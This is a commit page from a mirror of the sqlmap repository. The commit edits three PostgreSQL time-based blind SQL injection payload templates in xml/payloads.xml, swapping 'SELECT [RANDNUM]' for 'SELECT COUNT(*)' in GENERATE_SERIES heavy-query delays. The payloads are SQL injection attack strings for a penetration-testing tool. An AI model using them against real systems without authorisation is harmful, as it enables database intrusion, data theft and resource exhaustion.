sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

another fix for another beautiful heavy query payload which took a few 100 megs and 5 mins to run

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-09 10:35:18 +00:00
parent 094baadc5b
commit 71761ba9a5
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
xml/payloads.xml
View File

@ -1268,9 +1268,9 @@ Formats:
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
<request>
<payload>; SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000);</payload>
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000);</payload>
<comment>--</comment>
</request>
<response>
@ -1495,9 +1495,9 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
@ -1674,9 +1674,9 @@ Formats:
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
</request>
<response>
<time>[DELAYED]</time>